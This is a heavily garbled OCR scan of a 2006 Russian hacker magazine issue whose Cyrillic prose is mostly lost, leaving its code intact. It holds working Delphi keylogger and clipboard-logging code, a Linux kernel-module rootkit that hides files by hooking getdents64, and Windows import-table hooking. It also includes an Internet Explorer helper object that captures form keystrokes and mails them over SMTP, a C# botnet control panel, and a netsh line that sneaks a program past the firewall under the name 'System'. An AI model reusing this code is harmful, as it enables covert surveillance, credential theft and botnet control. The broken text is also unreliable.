Actual Spy.

, ,
,

42 09- 06

4/5
Actual Spy
www.actualspy.ru/
1.5


,
.
. , ,
.
, ,
,
( -

Windows),

. AVZ
,
:
C:\Program Files\
ASMonitor\hprog.dll -->
Keylogger
DLL
C:\Program Files\
ASMonitor\hk.dll -->
Keylogger
DLL
C:\Program Files
\ASMonitor\hk.dll>>>
:

1.
:
2.
: 2024
C:\Program Files\
ASMonitor\ASMonitor.exe
( = "Actual Spy

")


hprog.dll
, hk.dll .

, ,
hprog.dll
NT-.

, .
, BAT-
netsh firewall
add allowedprogram program=asmonitor.exe name=System.


asmonitor.exe

Firewall.

5/5

ELITE Keylogger 2.6 -


. www.widestep.com

3


( ).
. usbkbd.sys
.


ZwCreateKey, ZwEnumerateKey ZwOpenKey , .
extfs.sys

.
6- .
, , tdiip.sys
, ,
.


,
:
,
( ,
).

,

,

.
-

,


, -
.

3/5

: ,

Family Key Logger


www.spyarsenal.com

,
, , ,

AVZ:

,
C:\WINDOWS\
system32\CTF\ctfmon.dll -->
Keylogger
DLL
C:\WINDOWS\
system32\CTF\ctfmon.dll>>>

C:\WINDOWS\

system32\CTF\ctfs.dll -->

1.

Keylogger

DLL

2. :

C:\WINDOWS\

c:\windows\

system32\CTF\ctfs.dll>>>

system32\ctf\ctfmon.txt

3.

1.

: \windows\

43

system32\ctf\ctfmon.txt
4. ,

5.

6.

7.
ASCII-

5/5
Advanced Anti
Keylogger
www.anti-keylogger.net


PrivacyKeyboard www.anti-keylogger.net/,
800 .

.
,
, ,

, :).

: , ,
ActualSpy. Ctfs.dll



, ctfmon.dll
.
ActualSpy

,


ctfmon.txt,
.


.

, ,

( , , ).

,
.
, Advanced Anti
Keylogger
,



,
, .
Firewall.

4/5
PrivacyKeyboard
www.bezpeka.biz

PrivacyKeyboard

.
,

$90.


,
,
(
GUI- KeServiceDescriptorTableShadow
).

,
.
,
, . -
. , PrivacyKeyboard ,
DKOM-.

44 09- 06

.
. , DLL.
WH_JOURNALRECORD, , - , , . :

, DLL.
, DLL.
, WH_JOURNALRECORD
: ,
. :
CTRL+ALT+DEL CTRL+ESC
.
. : InstallHook
RemoveHook . , , API SetWindowsHookEx UnhookWindowsHookEx, , . HookHandle
INVALID_HANDLE_VALUE.
function InstallHook : boolean;
begin
if HookHandle = INVALID_HANDLE_VALUE then
HookHandle := SetWindowsHookEx
(WH_JOURNALRECORD, @HookProc, hInstance, 0);
Result := HookHandle <>
INVALID_HANDLE_VALUE;
end;
function RemoveHook : boolean;
begin
if HookHandle <> INVALID_HANDLE_VALUE then
UnhookWindowsHookEx(HookHandle);
HookHandle := INVALID_HANDLE_VALUE;
Result := true;
end;
, :
procedure TForm1.FormDestroy(Sender: TObject);
begin

RemoveHook;
end;
. nCode , . nCode
HC_ACTION, lParam EVENTMSG. HC_SYSMODALOFF HC_SYSMODALON
: ,
( )
. .
function HookProc(nCode: integer;
WParam: Word; LParam: LongInt): Longint;
stdcall;
var
EventMsg : PEventMsg;
// EventMsg
VirtCode : byte; //
ScanCode : dword; // -
KeyState : TKeyboardState;
//
Tmp, S : string; //
Res : integer;
begin
s := '';
if nCode = HC_ACTION then begin
EventMsg := pointer(LParam);
case EventMsg^.message of
WM_LBUTTONDOWN : S :=
' ';
WM_RBUTTONDOWN : S :=
' ';
WM_LBUTTONUP : S :=
' ';
WM_RBUTTONUP : S :=
' ';
WM_MOUSEMOVE : S := ' '+
' (X='+IntToStr(EventMsg^.paramL) +
', Y=' + IntToStr(EventMsg^.paramH)+')';
WM_KEYDOWN : begin
// -
VirtCode := EventMsg^.paramL and $FF;
ScanCode :=
(EventMsg^.paramL and $FF00) shl 8;
//
SetLength(Tmp, 32);
// , Res

Res := GetKeyNameText(ScanCode,

10 06: 1

www.xakep.ru

@Tmp[1], Length(Tmp));
S := ' "'+copy(Tmp, 1, Res)+'"';
//
GetKeyboardState(KeyState);
//
Res := ToAscii(VirtCode, ScanCode,
KeyState, @Tmp[1], 0);
if Res > 0 then
S := S + ' = "'+copy
(Tmp, 1, Res)+'"';
end;
else
S := 'message
'+IntToHex(EventMsg^.message, 4);
end;
Form1.Memo1.Lines.Add(s);
end;
Result := CallNextHookEx
(HookHandle, nCode, wParam, LParam);
end;
. nCode HC_ACTION,
EventMsg.
paramL X- , paramH Y.
paramL (
-,
), paramH 15- .
.
API GetKeyNameText ToAscii,
-. paramL, .
((EventMsg^.paramL and
$FF00) shl 8 , -
16..23.
8..15 paramL,
, 8 .
GetKeyNameText
, ToAscii
:
GetKeyboardState, -

:
.
.
.

45


ToAscii. GetKeyboardState
256 .

.
,
. , . WM_CANCELJOURNAL. ,
WM_CANCELJOURNAL .
procedure TForm1.OnAppMessage
(var Msg: TMsg; var Handled: Boolean);
begin
if (Msg.message = WM_CANCELJOURNAL) and
(HookHandle <> INVALID_HANDLE_VALUE)
then begin
HookHandle := INVALID_HANDLE_VALUE;
InstallHook;
Memo1.Lines.Add
('<< >>');
Handled := true;
end;
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
Application.OnMessage := OnAppMessage;
InstallHook;
end;
,
, Windows 9x
NT, DLL.

:
1 , .
2
WH_DEBUG.
,

.

,
. ,
. :
1 . , , .
2
SetClipboardViewer . -

.
3 , .
SetClipboardViewer
, .
.
SetClipboardViewer .
, SetClipboardViewer , SetClipboardViewer . WM_DRAWCLIPBOARD . , ( !) . , ,
, .
, -
, .
ChangeClipboardChain,

. WM_CHANGECBCHAIN , ,
.

. ,
. :
procedure TCMForm.FormCreate
(Sender: TObject);
begin
hNextClipboardViewer :=
SetClipboardViewer(Handle);
if hNextClipboardViewer > 0 then
Memo1.Lines.Add('
. Next hWnd = '+IntToHex
(hNextClipboardViewer, 8))
else
Memo1.Lines.Add(' GetLastError =
'+IntToStr(GetLastError));
end;
procedure TCMForm.FormDestroy
(Sender: TObject);
begin
ChangeClipboardChain
(Handle, hNextClipboardViewer);
end;
WM_CHANGECBCHAIN
WM_DRAWCLIPBOARD, :

procedure WMCHANGECBCHAIN(var Message:


TWMCHANGECBCHAIN); message
WM_CHANGECBCHAIN;
procedure WMDRAWCLIPBOARD(var Message:
TMessage); message WM_DRAWCLIPBOARD;
WM_CHANGECBCHAIN ,
:
procedure TCMForm.WMCHANGECBCHAIN
(var Message: TWMCHANGECBCHAIN);
begin
// ,
?
if Message.Remove =
hNextClipboardViewer then
hNextClipboardViewer := Message.Next;
SendMessage (hNextClipboardViewer,
Message.Msg, Message.Remove,
Message.Next);
end;
, WM_DRAWCLIPBOARD ,
.
:
procedure TCMForm.WMDRAWCLIPBOARD(var
Message: TMessage);
begin
//
Memo1.Lines.Add(clipboard.AsText);
Memo1.Lines.Add('--------------');
//

SendMessage (hNextClipboardViewer,
Message.Msg, Message.WParam,
Message.LParam);
end;
.
.
. ,
. , .

. 100%
. , ,

KeServiceDescriptorTableShadow .

!

46 09- 06


:
.
.
: ,
SPYWARE,
, , .
, ,
, .


semuha@mail.ru

.
. .
, Creeper
I'm the creeper : catch me if you can.

. , , . 1986
. Brain IBM- .
.
Brain
. Brain

,
, , ! ? , Brain .
90- . ,
? Chameleon, .
, . , ,

,
,
.
,
. , 90- . -, ,
.
Dark Avenger.

MtE.

47

. ,
. , Peach, 1992 ,
. , . , , backdoors. 1998 BackOrifice (Backdoor.BO), ()

. 2000 ,
BackOrifice BO2k, -

,
.
- ZippedFiles,
,
Neolite. Neolite ( , , ,
PKZip LZExe. . ). , ,

,
. ,
.
. , ,
,

XX , ,
.
, , , . , , ?

48 09- 06


, ,
,
, .
( :)).
. ,
, . -



DRM-
SONY.



FIRST 4 INTERNET. ,
.

.
,




.
,
,
$SYS$,
.


BACKDOOR.WIN32.BREPLIBOT.B,

.
-

,
$SYS$
($SYS$DRV.EXE). ,

DRM-
SONY
. BREPLIBOT
,
.

,
,



.

, , ,
-.

, ,
,
.
:
, , IM, , ntfs
.
. ,
UNIX
, Windows,
rootkit,
stealth-, Windows.


, ifconfig, ps, top, login, ls, netstat,
libproc.a.
,
. ,
.
, ,
, syslogd;
, .
, .
.
1 LKM.
, ,
.
2
. ,
, autofs, md5, scisi_mod, floppy.
.
3 ,
. , , , .
/dev/kmem.
LKM,
. , , . .
, . , ,
:

. url-
Paypal.

#include <dirent.h>
struct dirent *dirstr;
DIR * mydir=opendir("/tmp");
dirstr=readdir(mydir);
ltrace , :
SYS_getdents64(3, 0x08049678, 4096,
0x40014400, 0x4014c2c0)
getdents64 , struct dirent. - , getdents64,
dirent d_reclen d_name,
, . .
//
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <sys/syscall.h>
#include <asm/uaccess.h>
extern void *sys_call_table[];
int (*real_getd)(u_int fil, struct dirent *dirp, u_int cnt);
//
int our_getd (u_int fil, struct dirent
*dirp, u_int cnt)
{
//
struct dirent64 {
int d_ino1,d_ino2,d_off1,d_off2;
unsigned short d_reclen;
unsigned char d_type;
char d_name[0];
} *dirp2, *dirp3;
// ,
char file_hide[] = "file_to_hide";
//
unsigned int bak, n;
int bak2;
bak = (*real_getd)(fil,dirp,cnt);
if (bak>0) {

49

//


dirp2 = (struct dirent64 *)
kmalloc(bak,GFP_KERNEL);
copy_from_user(dirp2,dirp,bak);
//

dirp3 = dirp2;
bak2 = bak;
//
while (bak2>0) {
//
d_reclet

n = dirp3->d_reclen;
bak2 -= n;
//

if (strstr((char *)&(dirp3->d_name),
(char *)&file_hide) != NULL)
{
//



0-dday


,
.
zero-day ,
, .
, , . , ,
fishing-,
,
.
,
ntfs. ,
Stream
(ADS) NTFS.
, .
, cross-site scripting
-(-, ), -


memcpy(dirp3, (char *)
dirp3+dirp3->d_reclen, bak2);
bak -= n;
}
//

dirp3 = (struct dirent64 *)
((char *)dirp3+dirp3->d_reclen);
}
//
copy_to_user(dirp,dirp2,bak);
kfree(dirp2);
}
//

return bak;
}
// C

int init_module(void)
{
real_getd = sys_call_table[

. ,
Yamanner
2006 200
- Yahoo!Mail.
-.

. .

.
,
: xor
,
.
.

.
- html-
. ,
.
Feebs Scano,
,

SYS_getdents64];
sys_call_table
[SYS_getdents64]=our_getd;
return 0;
}
void cleanup_module()
{
sys_call_table
[SYS_getdents64]=real_getd;
}
Windows . . ,
root, rootkit,

. Windows
:
1 . Windows
-

java-. - False positive, .


C

Feebs Scano , , html . , exe- .doc. , .

. . . , 0-day. , , , ,
, .
, IT-,
,
.


eEye Digital Security , . ,

. Next-Generation Security ,
- BIOS. ACPI,
. Microsoft

, . , .
,
. ,
BIOS , , .
.

,
,
.

50 09- 06

, .
, . ,
,
, , Task Manager.
2 API-
dll. . dll: , , . ,
, DLL
, , DLL , - . ,

API-. API- / ,
GetProcAddress,
dll-,
.

.
/ , JUMP, . , ,
PE- .
, , dll.
.
,
. ,
,
, .
ExitWindowsEx
:
// ,
ExitWindowsEx
DWORD ExitW_Addr;
// dll-

Substitute().
, ,
dll -
, dll
,
DLL_PROCESS_ATTACH.
BOOL APIENTRY DllMain(HANDLE hm, DWORD my_f,
LPVOID lpcd)
{

if(my_f == DLL_PROCESS_ATTACH)
Substitute();
return TRUE;
}
//
Substitute(),
(.idata)
.
void Substitute (void)
{
//
PE-
BYTE *pimage = (BYTE*)
GetModuleHandle(NULL);
BYTE *pidata;
IMAGE_DOS_HEADER *imdh;
IMAGE_OPTIONAL_HEADER *imoh;
IMAGE_SECTION_HEADER *imsh;
IMAGE_IMPORT_DESCRIPTOR *imid;
DWORD *imsd;
//
PE-
imdh = (IMAGE_DOS_HEADER*)pimage;
imoh = (IMAGE_OPTIONAL_HEADER*)
(pimage + imdh->e_lfanew
+ 4 + sizeof(IMAGE_FILE_HEADER));
imsh = (IMAGE_SECTION_HEADER*)
((BYTE*)imoh + sizeof
(IMAGE_OPTIONAL_HEADER));
//
PE-
if (imdh->e_magic != 0x5A4D)
{
printf(" PE-");
return -1;
}
// .idata
for(int i=0; i<16; i++)
if(strcmp((char*)
((imsh+ i)->Name) , ".idata") == 0) break;
if(i==16)
{
printf(" .idata");
return -1;
}
// .idata
imid = (IMAGE_IMPORT_DESCRIPTOR*)
(pimage + (imsh +i)->VirtualAddress );
//

ExitW_Addr = (DWORD)GetProcAddress
(GetModuleHandle("user32.dll"),
"ExitWindowsEx");
if(ExitW_Addr == 0)
{
printf(NULL, "
ExitW_Addr");
return -1;
}
// ExitWindowsEx
user32.dll,


while(imid->Name)
{
if(strcmp((char*)(pimage + imid->Name),
"USER32.dll") ==0 ) break;
imid++;
}
//
imsd = (DWORD*)(
pimage + imid->FirstThunk);
while
(*imsd!=ExitW_Addr && *imsd!=0) imsd++;
if(*imsd == 0)
{
printf("ExitW_Addr .idata");
return -1;
}
//
DWORD func_b = (DWORD)&OurFunction;
DWORD a;
//

VirtualProtect((void*)(imsd),4,
PAGE_READWRITE, &a);
//
WriteProcessMemory(GetCurrentProcess(),
(void*)(isd),
(void*)&func_b,4,&written);
//
VirtualProtect((void*)(imsd),4,a, &a);
if(written!=4)
{
printf(" ");
return -1;
}
}
// :
BOOL WINAPI OurFunction(UINT uFl, DWORD dwR)
{
//
, ,
.

//
ExitWindowsEx
((BOOL (__stdcall*)(HWND, char*, char*,
UINT))ExitW_Addr)(uFlags, dwReason);
return 0;
}
? , ,
. . ,

http://en.wikipedia.org/wiki/Rootkit
wikipedia
http://www.chkrootkit.org
chkrootkit

52 09- 06

SPYWARE BHO
IE .
? , ,
.
( )? ,
,

aka zOrd
ICQ: 291637112, www.offbit.1gb.ru
Browser Helper Object.
, Browser Helper Object DLL,
Windows
Microsoft Internet Explorer ( Get Right,
Flyswats, Quiver, Blink, iHarvest Godzilla).
(helper ), , ( ),
DLL ,
, BHO. BHO , Browser Helper Objects spyware.
BHO . BHO COM, DLL
, COM-,
, ,
. IObjectWithSite IWebBrowser2,
!
,

-
, .
.
, BHO,
, .
-? , , e-mail .

,
get_Document, IDispatch.
IHTMLDocument2. , .
BHO. , ? . Win32 Application, ALT COM,
, ALT COM--

.
Add ALT Objects Internet Explorer Object. ,
, .
, BHO.
, , :
class ATL_NO_VTABLE CBHO:
public CComObjectRootEx
<CComSingleThreadModel>,
public CComCoClass<CBHO, &CLSID_BHO>,
public IObjectWithSiteImpl<CBHO>,
public IDispatchImpl<IBHO, &IID_IBHO,
&LIBID_IEPLUGINLib>
,
:

53

public:
STDMETHOD(SetSite)(IUnknown *pUnkSite);
STDMETHOD(Invoke)(DISPID, REFIID, LCID,
WORD, DISPPARAMS*, VARIANT*, EXCEPINFO*,
UINT*);
private:
STDMETHOD(Connect)(void);
CComQIPtr<IWebBrowser2,
&IID_IWebBrowser2> m_spWebBrowser2;
CComQIPtr<IConnectionPointContainer,
&IID_IConnectionPointContainer> m_spCPC;
DWORD m_dwCookie;
, spyware .
MSDN onkeypress ( MSDN 2005),
get_onkeypress, IHTMLElement::onkeypress).

.
get_Document,
IDispatch.
:
CComPtr <IDespath> pDisp;
m_spWebBrowser2->get_Document(&pDesp);
IHTMLDocument . :
CComPtr <IHTMLDocument2,
&IID_IHTMLDocument2> spHTML;
spHTML = pDisp;

.

get_body, spHTML. , , ,
spyware.
IHTMLElement , / . .

. ,
onkeypress:
HTMLTextContainerEvents2
HTMLAnchorEvents2
HTMLFormElementEvents2
HTMLTableEvents2

, :

BHO Visual C++

#define BUFSIZE 4096


...
HTMLTextContainerEvents2->
onkeypress(&pDesp)
...
BHO . ,
. - , ?
!
URL
.
get_LocationURL, :
BSTR wstr;
m_spWebBrowser->get_LocationURL(&wstr);
wstr
, .
. :
DWORD dwBytesRead, dwBytesWritten,
dwBufSize=BUFSIZE;
#define BUFSIZE 4096
BOOL f_wf;
f_wf=WriteFile(hTempFile, buffer,
dwBytesRead, &dwBytesWritten, NULL);
. ,
, . Browser
Helper Object , .

rgs. , ,

.
, BHO , . ,
, CLSID TypeLib ,
BHO.
, ,
BHO IE:
HLKM
{SOFTWARE
{Microsoft
{Windows
{Current Version
{Explorer
{Browser Helper Objects
{Force Remove
{G4G53DNL-Q9LF-OV7D- 3753538543BVB7}=s
SPYFORM
}}}}}}}

regsvr32 c /s /c DLL.
? ,
,
.
?
.
, :
#define BUFSIZE 4096
void WriteBuffer (void)
{
hFile = CreateFile("spyform.txt",
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);

54 09- 06

...
DWORD dwBytesRead;
#define BUFSIZE 4096
BOOL f_rf;
f_rf= ReadFile(hFile, buffer, 4096,
&dwBytesRead, NULL)
BYTE bBugIE[BUFSIZE];
...
CloseHandle(hFile);
}

, ActiveX.
Explorer , .
ActiveX
CLSID, CLSID
ActiveX (
WScript.Network):


SMPT. smpt-:

<script>
function modify(){
theActiveX.setCLSID("{F935DC26-1CF0-11D0ADB9-00C04FD58A0B}")// CLSID
// .
//
, ,

theActiveX.createInstance()
//
WshNetwork = theActiveX.GetObject()
//
var userName=WshNetwork.UserName;
//
}
</script>

SOCKET nSMTPServerSocket;
struct sockaddr_in smtp_address;
int nConnect;
int iLength;
int iMsg = 0;
int iEnd = 0;
BYTE sBuf[4096];
:
char *MailMessage[] =
{
"HELO SpyForm\r\n",
"MAIL FROM:<---->\r\n",
//
"RCPT TO:<---->\r\n",
//
"DATA\r\n",
"<&BugIE\r\n\r\n.\r\n",
//
"QUIT\r\n",
NULL
};
smtp_address
,
,
.
:
-.
. . :

? ActiveX-,
, . ,
, Word Excel. web-, HTML.

ActiveX . ,
,
.. ActiveX- .

.


, , :
<script>setTimeout
("modify()",1000);//
CLSID
</script>
CLSID-
CLSID,

!
! ,
,
! , BHO.
, - , ? ,
. , BHO
,
URL. .
//
IWebBrowser2
m_spWebBrowser->Navigate
(TEXT("http://www.offbit.1gb.ru")0,0,0,0)
BHO --

! ,
, . ,
:
IObjectWithSite
IPersistStream
IDeskBand
IDeskBand. , , ,
!
. :
STDMETHODIMP CExplorerBar::ShowDW
(BOOL fShow)
{
if(m_hWnd)
{
if(fShow)
{
//show our window
ShowWindow(m_hWnd, SW_SHOW);
}
else
{
//hide our window
ShowWindow(m_hWnd, SW_HIDE);
}
}
return S_OK;
}
, ,
MSDN, Creating Custom Explorer Bars, Tool Bands, and Desk Bands Bars & Bands.

Internet Explorer, .
IHTMLDocument2
, , , : close, open,
offline , , write. IE !
The End.
BHO. MSDN,
,
. ,

!
, , !
http://msdn.microsoft.com/library/default.asp?url=/library/
en-u
us/dnwebgen/html/bho.asp
BHO
www.anticha t.ru/activex
ActiveX

:


KERNEL-
IBM PC
#
FLASH
-

DELPHI 2006

WINDOWS V ISTA
.
MICROSOFT. . ,
.
W INDOWS
WINDOWS.
. .

56 09- 06


-

,

.

,
,
DDOS-,
,

.
,
BOT CONTROL CENTER
aka Sulverus,
sulverus@mail.ru (Offbit Security Team)

? ,
, ,
, : ,
,
. , : , ,

.., . control
center ,
,
- .
, 100% , -

, ,
, ,
- . ,
, -,
. , , , - . . ,
!

. ,
perle'e php,
, #. - ASP.NET, C# -.
ASP.NET Web Site C# .
ASP.NET
System.Web. UI, WebControls, WebControls.WebParts, HtmlControls.
( , , ),
Sy-

57

, , ,
,
. , .
,
ListBox. , : ,
. , .
,
System.Text
, :
string int.
Convert, .
IP- int:

ListBox'a, , , :

string items =
ListBox1.Items.Count.ToString();
int itm = Convert.ToInt32(items);

int:
string BOTport = TextBox4.Text;
int prt = Convert.ToInt32(BOTport);

stem.Web.Security. : , , ,
.
. , , .
. , . , System.Net System.Net.Sockets.
, , .
-. , , IP-


( ).
, : , ,
.
IPHostEntry, IPAdress, IPEndPoint, , TCP,
,
Encoding.ASCII.GetBytes(msg). , , . Socket.Shutdown() Socket.Close(). ,
. , ,
: ,
IP- -

string msg = TextBox1.Text;


byte[] msg2 = Encoding.ASCII.GetBytes(msg);
, ,
.
. -,
web.config,
.
<authentication mode="Windows"/>

<authentication mode="Off"/>,
, , ,
.
.
.
Vista Style. ,

, ,
, .
?
, ,
,
. . -

...

58 09- 06


for (i = 0; i < itm; i++)
{
ListBox1.SelectedIndex = i;
IPHostEntry host = Dns.Resolve(ListBox1.SelectedItem.Text);
//

(1)

IPAddress ip = host.AddressList[0];
//
IPEndPoint ep = new IPEndPoint(ip, prt);
Socket client_sock = new Socket(AddressFamily.InterNetwork,
SocketType.Stream, ProtocolType.Tcp);
try
{
client_sock.Connect(ep);
string msg = "privet";
//:)
byte[] msg2 = Encoding.ASCII.GetBytes(msg); //
int send_msg = client_sock.Send(msg2);
byte[] data = new byte[1024];
int recv = client_sock.Receive(data);
ListBox2.Items.Add(ip.ToString());
client_sock.Shutdown(SocketShutdown.Both); //
client_sock.Close();
}
catch (SocketException Sock)
{
TextBox7.Text = Sock.ToString();
}
}

,
, , -, . .
ASP.NET Web Service.
?

, ,
,
http- -
( ). System.Web.Services, System.Web.Services.Protocols,
System.Web.Services.Description System.Web.Services.Discovery.
,
- . - HTTP GET/POST SOAP. HTTP. , C#
, [WebMethod]
, , .
, , ,

, : System.Net, Sy-

stem.Net.Sockets, System.Text ASCII,


. , ,
IP-, , , ,
: BINAN(Bot Is Not Available Now). ,
,


:
c
[WebMethod]
public string ActiveBots(string ip,
string port)
{
try
{
int prt = Convert.ToInt32(port);
//
return ip;
}
catch(...)
{
port = "BINAN";
return port;
}
.
, IP- , . .NET, int,
ToInt32() Convert.
IP- ,
, xml-. BINAN
xml. .
.
. ?
-
http-, . , - -.
, ,


. , Windows Application. -,
.
Solution Explorer,
Add Web Reference. - .
,
: using localhost. localhost -

59

.
-.
. ,
,
. :
localhost.Service bots =
new localhost.Service();
string go = bots.ActiveBots(ip, port);
, , , ,
:

for (i = 0; i < itm; i++)
{
listBox1.SelectedIndex = i;
try
{
string ip =
listBox1.SelectedItem.ToString();
string go =
bots.ActiveBots(ip, "11000");
textBox1.Text = go.ToString();
if (go != "BINAN")
{
listBox2.Items.Add(ip.ToString());
}
} //...
.
: --- -,
-
( ).
,
-
. -, ,
, .
.
spyware-,
, ,
.
.NET'e.
:
- :
if (info.IndexOf("privet") > -1) {
byte[] send_text =
Encoding.ASCII.GetBytes(ip + ":
OKAY!!!"); }

,
.
11000 Net Net.Sockets. :

try
{
listn.Bind(ep); //
listn.Listen(2); //
while (true)
{
Console.WriteLine("Listing.. port
{0}", ep);
Socket hnd = listn.Accept();
//
string info = null;
while (true)
{
byte[] data_g = new byte[1024];
int recev = hnd.Receive(data_g);
//
info += Encoding.ASCII.GetString
(data_g, 0, recev);
//
//

. .NET .
,
-.
, , . . ,
, -. 1-2
, 3-4 :).
, .NET ,
, , 2005
. : DDoS-
.
//
,
,
net renderinga
3d max'e. , . - ,
-
-
,
-
,
,

60 / 79

60

72

68

76 ,


( ) .
SOFT-ICE
,
,

aka

MS-DOS
.
,
,
. ( malware)
, , ..
Windows .

, ,
.

.

( ) Windows .
,
,
.
,

soft-ice .
, . , soft-ice, <CTRL-D>,
... - ?! ...

61

62 09- 06

soft-ice ( )
:THREAD -x
Extended Thread Info for thread 374
KTEB
873CFDA0
TID:
374
Process: va_thread(11C)
Start EIP:
KERNEL32!SetUnhandledExceptionFilter+001A (77E878C1)
User Stack: 00030000 00130000 Stack Ptr:
0012FD24

KTEB:
Start EIP:
User Stack:

Extended Thread Info for thread 238


82007020
TID:
238
Process: va_thread(11C)
KERNEL32!CreateFileA+00C3 (77E92C50)
00420000 00520000 Stack Ptr:
FFFFFFFF

KTEB:
Start EIP:
User Stack:

Extended Thread Info for thread 30C


82007AC0
TID:
30C
Process: va_thread(11C)
KERNEL32!CreateFileA+00C3 (77E92C50)
00530000 00630000 Stack Ptr:
FFFFFFFF
(2)

, OllyDbg
Ident
050C
0558
055C
0578

Entry
7943B700
00000000
00000000
00000000

Data block
7FFDB000
7FFDC000
7FFDE000
7FFDD000

Last error
ERROR_SUCCESS
ERROR_SUCCESS
ERROR_SUCCESS
ERROR_SUCCESS

(1)

Status
Active
Suspended
Suspended
Suspended

Priority
32 + 0
32 + 0
32 + 0
32 + 0

558h,
401000 55
PUSH EBP
401001 8B EC
MOV EBP,ESP
401003 B8 01000000
MOV EAX,1
401008 85C0
TEST EAX,EAX
40100A 74 02
JE SHORT va_threa.0040100E
40100C EB F5
JMP SHORT va_threa.00401003

(3)

55Ch

62FFDC FFFFFFFF End of SEH chain
62FFE0 79481F54 SE handler
62FFE4 79432B08 KERNEL32.79432B08
62FFE8 00000000
62FFEC 00000000
62FFF0 00000000
62FFF4 00520000
; 55h
62FFF8 00000666
; ,
62FFFC 00000000
;

(4)

va_thread
Address Size Owner
Section Contains
400000 1000 va_threa
PE header
401000 4000 va_threa .text code
405000 1000 va_threa .rdata imports
406000 2000 va_threa .data data
410000 2000
Map
51E000 1000
Priv
51F000 1000
stack of thr
Priv
520000 1000
Priv
62E000 1000
Priv

(5)
Type
Imag
Imag
Imag
Imag
R
RW
RW
RWE
RW

Access
R
R
R
R
Guar
Guar
Guar

Initial
RWE
RWE
RWE
RWE
R
RW
RW
RWE
RW

. , ( PE-, , , - ).
malware- / , .
,
,
.  
  , xxx
( ). , , . : FAR'
(<CTRL-F8>)
WINNT, System32 ..
, , !
, ,

,
. , ( , Program Files, WINNT System32),
( , ),
.
.
, win32-API, , , . NTFS- , API. ,
30h ($FILE_NAME)
//
MFT (Master File Table ,
).
MFT ,
. 10h ($STANDARD_INFORMATION),
// MFT, , 30h, MFT , ,
.
, MFT .
NtExplorer Runtime Software. -

63

, ,
Windows
( hldrrr.exe,
C:\WINNT\system32)


Runtime NtExplorer
(FAR , 07.05.2004,
MFT
18.07.2006)

.
(
),
, .
?
NT : TOOLHELP32
( 9x), KERNEL32.DLL,
NtQuerySystemInformation ( NTDLL.DLL),
97h, NTOSKRNL.EXE. ,
TOOLHELP32 CreateToolhelp32Snapshot
NtQuerySystemInformation, , .
Process32First/Process32Next TOOLHELP32,
,
( , FAR tlist.exe SDK) NtQuerySystemInformation ( soft ice).
NtQuerySystemInformation
, TOOLHELP32. , :
NTDLL.DLL ,
NTQUERYSYSTEMINFORMATION
( - NTDLL.DLL),


. , NTDLL.DLL
. SFC SERVICEPACK',
NTDLL.DLL.
1


FAR'

NTDLL.DLL!NTQUERYSYSTEMINFORMATION . NT COPY-ON-WRITE,

, NTDLL.DLL
,
-. , , .
. DLL

2

, Norton Disk Editor,


NTFS. , NtExplorer
, , . NTFS
( ) ,
- , :
http://linux-ntfs.sourceforge.net. ,
, . !

:
HKLM\SOFTWARE\MICROSOFT\WINDOWS
NT\CURRENTVERSION\WINDOWS\APPINIT_DLLS. DLL

.
NTDLL.DLL
,
(TASKMNG.EXE, FAR.EXE, TLIST.EXE . .).
, NTQUERYSYSTEMINFORMATION,
. , , APPINIT_DLLS, ,
.
TASKMNG.EXE ( ),
PROCLIST.DLL ( FAR', ), TLIST.EXE ( ), NTQUERYSYSTEMINFORMATION . ,

PE TOOLS
PROCDUMP'. GETPROCADDRESS, NTDLL.DLL.
3

, NTOSKRNL.EXE
97h .

(
SST).
Soft-Ice NtQuerySystemInformation

,
.
,
soft-ice (, PROC),
, IceExt/IceDump (, ).

. , IceExt, soft-ice ,
, ,
.

64 09- 06

578h
12FFE0 FFFFFFFF End of SEH chain
12FFE4 79481F54 SE handler
12FFE8 79432B18 KERNEL32.79432B18
12FFEC 00000000
12FFF0 00000000
12FFF4 00000000
12FFF8 00401405 va_threa.<ModuleEntryPoint>; 578h
12FFFC 00000000
;

(6)

ZwQuerySystemInformation
97h
.text:77F95BBD
public ZwQuerySystemInformation
.text:77F95BBD
ZwQuerySystemInformation proc near
.text:77F95BBD
arg_0 = byte ptr 4
.text:77F95BBD
.text:77F95BBD B8 97 00 00 00 mov
eax, 97h ; NtQuerySystemInformation
.text:77F95BC2 8D 54 24 0
lea
edx, [esp+arg_0]
.text:77F95BC6 CD 2E
int
2Eh
.text:77F95BC8 C2 10 00 retn 10h
.text:77F95BC8
ZwQuerySystemInformation endp

(7)

soft-ice,
97h
:dd
:d KeServiceDescriptorTable
0008:8046AB80 804704D8 00000000 000000F8 804708BC ..G...........G.

(8)

:d 804704D8
0008:804704D8 804AB3BF 804AE86B 804BDEF3 8050B034 ..J.k.J...K.4.P.
0008:804704E8 804C11F4 80459214 8050C2FF 8050C33F ..L...E...P.?.P.
0008:804704F8 804B581C 80508874 8049860A 804FC7E2 .XK.t.P...I...O.
:u *(804704D8 + 97*4)
ntoskrnl!NtQuerySystemInformation
0023:804BF933
PUSH
EBP
0023:804BF934
MOV
EBP, ESP
0023:804BF936
PUSH
FF
0023:804BF938
PUSH
804043A0
0023:804BF93D
PUSH
ntoskrnl!_except_handler3
, NTOSKRNL.EXE
.data:004704D8 BF B3 4A 00 _KiServiceTable dd offset _NtAcceptConnectPort@24
.data:004704DC 6B E8 4A 00
dd offset _NtAccessCheck@32
.data:004704E0 F3 DE 4B 00
dd offset _NtAccessCheckAndAuditAlarm@44

(9)

SDT-, NTOSKRNL.EXE
.data:0046AB80 ; Exported entry 516. KeServiceDescriptorTable
.data:0046AB80 public _KeServiceDescriptorTable
.data:0046AB80 _KeServiceDescriptorTable dd 0

(10)

IDT soft-ice
:IDT
Int
Type
Sel:Offset
IDTbase=80036400 Limit=07FF
0000 IntG32 0008:804625E6
0001 IntG32 0008:80462736
0002 IntG32 0008:0000144E
0003 IntG32 0008:80462A0E

(11)
Attributes Symbol/Owner
DPL=0
DPL=3
DPL=0
DPL=3

P
P
P
P

ntoskrnl!Kei386EoiHelper+0590
ntoskrnl!Kei386EoiHelper+06E0
ntoskrnl!Kei386EoiHelper+09B8

,
.
. ,
, . , , BSOD,
...
, soft-ice + IceExt
( )
.
.

( ), . .

VirtualAllocEx, WriteProcessMemory CreateRemoteThread. , ,
EIP SetThreadContext
